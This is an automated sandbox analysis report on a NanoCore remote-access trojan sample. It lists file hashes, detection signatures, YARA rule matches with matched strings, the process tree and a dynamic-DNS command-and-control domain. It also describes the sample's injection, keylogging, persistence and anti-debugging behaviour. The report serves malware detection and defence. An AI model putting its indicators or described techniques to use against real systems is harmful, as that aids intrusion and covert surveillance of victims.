Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report d4e475d7d17a16be8b9eeac6e10b25af

Overview

General Information

Sample Name:d4e475d7d17a16be8b9eeac6e10b25af (renamed file extension from none to exe)
Analysis ID:320928
MD5:5162337b6fd4c8806ef62f6ebf4a5df8
SHA1:126642db1117de853d7e0ae601e0ff45358d7413
SHA256:9c2e4a4a0e7bb4c3c47ca33ec0d0c377fa38e0ae498721062432648ebf060a10
Tags:NanoCore

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Uses dynamic DNS services
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • d4e475d7d17a16be8b9eeac6e10b25af.exe (PID: 576 cmdline: 'C:\Users\user\Desktop\d4e475d7d17a16be8b9eeac6e10b25af.exe' MD5: 5162337B6FD4C8806EF62F6EBF4A5DF8)
    • RegAsm.exe (PID: 5656 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • DiagnosticsHub.StandardCollector.Service.exe.bat (PID: 5944 cmdline: 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat' MD5: F660ED54597E4FF5354B557329CAB70D)
    • RegAsm.exe (PID: 4332 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe MD5: 529695608EAFBED00ACA9E61EF333A7C)
  • dhcpmon.exe (PID: 5860 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"C2: ": ["255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf34d:$x1: NanoCore.ClientPluginHost
  • 0xf38a:$x2: IClientNetworkHost
  • 0x12ebd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xf0b5:$a: NanoCore
    • 0xf0c5:$a: NanoCore
    • 0xf2f9:$a: NanoCore
    • 0xf30d:$a: NanoCore
    • 0xf34d:$a: NanoCore
    • 0xf114:$b: ClientPlugin
    • 0xf316:$b: ClientPlugin
    • 0xf356:$b: ClientPlugin
    • 0xf23b:$c: ProjectData
    • 0xfc42:$d: DESCrypto
    • 0x1760e:$e: KeepAlive
    • 0x155fc:$g: LogClientMessage
    • 0x117f7:$i: get_Connected
    • 0xff78:$j: #=q
    • 0xffa8:$j: #=q
    • 0xffc4:$j: #=q
    • 0xfff4:$j: #=q
    • 0x10010:$j: #=q
    • 0x1002c:$j: #=q
    • 0x1005c:$j: #=q
    • 0x10078:$j: #=q
    00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 77 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1018d:$x1: NanoCore.ClientPluginHost
      • 0x101ca:$x2: IClientNetworkHost
      • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xff05:$x1: NanoCore Client.exe
      • 0x1018d:$x2: NanoCore.ClientPluginHost
      • 0x117c6:$s1: PluginCommand
      • 0x117ba:$s2: FileCommand
      • 0x1266b:$s3: PipeExists
      • 0x18422:$s4: PipeCreated
      • 0x101b7:$s5: IClientLoggingHost
      2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0xfef5:$a: NanoCore
        • 0xff05:$a: NanoCore
        • 0x10139:$a: NanoCore
        • 0x1014d:$a: NanoCore
        • 0x1018d:$a: NanoCore
        • 0xff54:$b: ClientPlugin
        • 0x10156:$b: ClientPlugin
        • 0x10196:$b: ClientPlugin
        • 0x1007b:$c: ProjectData
        • 0x10a82:$d: DESCrypto
        • 0x1844e:$e: KeepAlive
        • 0x1643c:$g: LogClientMessage
        • 0x12637:$i: get_Connected
        • 0x10db8:$j: #=q
        • 0x10de8:$j: #=q
        • 0x10e04:$j: #=q
        • 0x10e34:$j: #=q
        • 0x10e50:$j: #=q
        • 0x10e6c:$j: #=q
        • 0x10e9c:$j: #=q
        • 0x10eb8:$j: #=q
        3.2.RegAsm.exe.400000.0.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0x1018d:$x1: NanoCore.ClientPluginHost
        • 0x101ca:$x2: IClientNetworkHost
        • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        Click to see the 7 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 5656, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeAvira: detected
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batAvira: detection malicious, Label: HEUR/AGEN.1100084
        Found malware configurationShow sources
        Source: RegAsm.exe.4332.3.memstrMalware Configuration Extractor: NanoCore {"C2: ": ["255.255.255.255"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeVirustotal: Detection: 66%Perma Link
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeMetadefender: Detection: 37%Perma Link
        Source: d4e475d7d17a16be8b9eeac6e10b25af.exeReversingLabs: Detection: 70%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
        Source: Yara matchFile source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE
        Source: 3.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00424696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00424696
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423D4E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004245C1 FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,2_2_004245C1
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C93C FindFirstFileW,FindClose,2_2_0042C93C
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0042C9C7
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F200
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0042F35D
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042F65E FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0042F65E
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00423A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00423A2B
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0042BF27 FindFirstFileW,FindNextFileW,FindClose,2_2_0042BF27

        Networking:

        barindex
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: windowslivesoffice.ddns.net
        Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_004325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_004325E2
        Source: unknownDNS traffic detected: queries for: windowslivesoffice.ddns.net
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0043425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0043425A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0043425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0043425A
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_00420219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00420219
        Source: RegAsm.exe, 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
        Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.batCode function: 2_2_0044CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0044CDAC

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4332, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: d4e475d7d17a16be8b9eeac6e10b25af.exe PID: 576, type: MEMORY
        Source: Yara matchFile source: 2.3.DiagnosticsHub.StandardCollector.Service.exe.bat.e60000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.d4e475d7d17a16be8b9eeac6e10b25af.exe.38e0000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.255242846.0000000000FA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.211542928.00000000038E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.209839006.00000000010BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.249609796.0000000000402000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.254683276.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.209991404.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.209808084.0000000001147000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.209532145.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231856687.000000000112F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.230915051.0000000001129000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231281467.0000000001180000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.230856862.00000000011B4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.254526561.00000000011E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.254613953.00000000011B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.254797061.0000000000F9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231188805.0000000001154000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.250629843.0000000004451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.210637735.000000000106B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.232736755.0000000000E62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231305365.0000000001181000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231549555.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.250595233.0000000003451000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.210116902.00000000010E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000003.210229940.0000000001114000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000002.00000003.231711637.00000000010FD000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 5944, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
